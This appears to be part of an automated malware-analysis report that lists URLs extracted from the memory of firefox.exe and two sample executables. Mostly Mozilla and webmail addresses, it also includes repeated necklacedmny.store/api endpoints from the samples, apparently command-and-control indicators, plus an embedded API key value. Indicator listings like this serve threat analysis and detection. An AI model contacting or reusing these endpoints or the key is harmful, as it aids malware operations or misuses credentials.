Source: firefox.exe, 0000001B.00000002.2757990027.000001C172674000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
Source: firefox.exe, 0000001B.00000002.2757990027.000001C172674000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
Source: firefox.exe, 0000001B.00000002.2757990027.000001C172674000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
Source: firefox.exe, 0000001B.00000002.2757990027.000001C172674000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
Source: firefox.exe, 0000001B.00000002.2757990027.000001C172674000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
Source: firefox.exe, 0000001B.00000002.2757990027.000001C172674000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DE6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2722359273.000002B7970C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 0000001B.00000002.2757990027.000001C172674000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
Source: firefox.exe, 0000001B.00000002.2749174259.000001C171903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DE6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2722359273.000002B7970C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basic
Source: firefox.exe, 0000001B.00000002.2754695951.000001C171C03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/
Source: firefox.exe, 0000001B.00000003.2674078299.000001C17CD4F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/google/closure-compiler/issues/3177
Source: firefox.exe, 0000001B.00000003.2598025300.000001C174877000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2762165135.000001C1731A0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000003.2597108445.000001C17481F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2597604309.000001C17485A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2597314679.000001C17483C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2596897657.000001C174600000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshotsinternal:svgContextPropertiesAllowed/shims/google-ana
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/zertosh/loose-envify)
Source: firefox.exe, 0000001B.00000002.2749174259.000001C171978000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2757990027.000001C172674000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com
Source: firefox.exe, 0000001B.00000002.2785119034.000001C1752DB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com/
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2733122243.000001C164C11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881BaseCont
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://ideas.mozilla.org/
Source: firefox.exe, 00000020.00000002.2722359273.000002B7970E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 0000001B.00000002.2736994657.000001C1704F9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org
Source: firefox.exe, 0000001B.00000002.2757990027.000001C172674000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2722359273.000002B7970E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://install.mozilla.org
Source: firefox.exe, 0000001B.00000002.2785119034.000001C1752B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema.
Source: firefox.exe, 0000001B.00000002.2785119034.000001C1752B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema./
Source: firefox.exe, 0000001B.00000002.2785119034.000001C1752B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2020-12/schema/
Source: firefox.exe, 0000001B.00000002.2785119034.000001C1752B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2020-12/schema/=
Source: firefox.exe, 0000001B.00000002.2733122243.000001C164C03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
Source: firefox.exe, 0000001B.00000003.2680870116.000001C1770FB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 0000001B.00000002.2754695951.000001C171C21000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%sbrowser.download.viewableInternally.enabledTypesMu
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2757990027.000001C17268F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%sScheme
Source: firefox.exe, 0000001B.00000002.2757990027.000001C1726EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%sv
Source: firefox.exe, 0000001B.00000003.2599955209.000001C172133000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2742669039.000001C17097D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2755914976.000001C172139000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2757990027.000001C17268F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 0000001B.00000002.2757990027.000001C1726EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%st
Source: firefox.exe, 00000020.00000002.2722359273.000002B797086000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mitmdetection.services.mozilla.com/
Source: firefox.exe, 0000001B.00000002.2733122243.000001C164C03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2744766730.000001C170CD2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/about
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/breach-details/
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/dashboard
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/preferences
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mozilla-hub.atlassian.net/browse/SDK-405
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mzl.la/3NS9KJd
Source: file.exe, 00000000.00000003.1845555563.000000000115F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store
Source: 6cadd3f0fd.exe, 00000009.00000003.2731093184.0000000000778000.00000004.00000020.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2689945232.0000000001066000.00000004.00000020.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2689945232.00000000010B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/
Source: 6cadd3f0fd.exe, 0000000D.00000003.2689945232.0000000001066000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/9Sbqj
Source: 6cadd3f0fd.exe, 00000009.00000003.2556995492.000000000077E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/H
Source: 6cadd3f0fd.exe, 0000000D.00000003.2689945232.0000000001066000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/X
Source: 6cadd3f0fd.exe, 0000000D.00000003.2716729398.00000000010E0000.00000004.00000020.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2658132730.00000000010C0000.00000004.00000020.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2689945232.000000000109D000.00000004.00000020.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2628157062.00000000010C0000.00000004.00000020.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2604592172.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2628798588.00000000010C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/api
Source: 6cadd3f0fd.exe, 00000009.00000003.2557653647.0000000000792000.00000004.00000020.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2557372250.000000000078F000.00000004.00000020.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2732085528.0000000000793000.00000004.00000020.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2547569165.0000000000794000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/api-
Source: 6cadd3f0fd.exe, 00000009.00000003.2732085528.0000000000793000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apiA
Source: 6cadd3f0fd.exe, 0000000D.00000003.2688087863.00000000010E0000.00000004.00000020.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2687309594.00000000010DF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apiF
Source: file.exe, 00000000.00000003.1845555563.000000000115F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apiI
Source: file.exe, 00000000.00000003.1844921816.00000000011C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1845532345.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1845244184.00000000011CB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apiOpjzCuI8nqza2hkp8xe/v7rM
Source: 6cadd3f0fd.exe, 0000000D.00000003.2628157062.00000000010C0000.00000004.00000020.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2628798588.00000000010C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/api_
Source: 6cadd3f0fd.exe, 0000000D.00000003.2628157062.00000000010C0000.00000004.00000020.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2604592172.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2628798588.00000000010C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apidr
Source: 6cadd3f0fd.exe, 0000000D.00000003.2658132730.00000000010C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apis
Source: file.exe, 00000000.00000003.1844921816.00000000011C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1845532345.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1845244184.00000000011CB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apix1P
Source: 6cadd3f0fd.exe, 0000000D.00000003.2689945232.0000000001066000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/za
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://oauth.accounts.firefox.com/v1
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ok.ru/
Source: firefox.exe, 0000001B.00000003.2599955209.000001C172133000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2755914976.000001C172139000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2757990027.000001C17268F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
Source: firefox.exe, 0000001B.00000003.2599955209.000001C172133000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2742669039.000001C17097D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2755914976.000001C172139000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2757990027.000001C17268F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sresource://gre/modules/FileUtils.sys.mjsisDownloadsImprovemen
Source: firefox.exe, 0000001B.00000002.2757990027.000001C1726EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sx
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://probeinfo.telemetry.mozilla.org/glean/repositories.
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://prod.ohttp-gateway.prod.webservices.mozgcp.net/ohttp-configs
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/xr/
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/privacy/subscription-services/
Source: 6cadd3f0fd.exe, 0000000D.00000003.2638368744.0000000005973000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: firefox.exe, 0000001B.00000003.2683990291.000001C175A58000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2683314621.000001C175A4A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: 6cadd3f0fd.exe, 0000000D.00000003.2638368744.0000000005973000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: file.exe, 00000000.00000003.1711563084.0000000005B3D000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2485074230.000000000559C000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2638368744.0000000005973000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: 6cadd3f0fd.exe, 0000000D.00000003.2638368744.0000000005973000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/android/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#crash-reporter
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
Source: firefox.exe, 00000020.00000002.2722359273.000002B7970C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 0000001B.00000002.2757990027.000001C172674000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
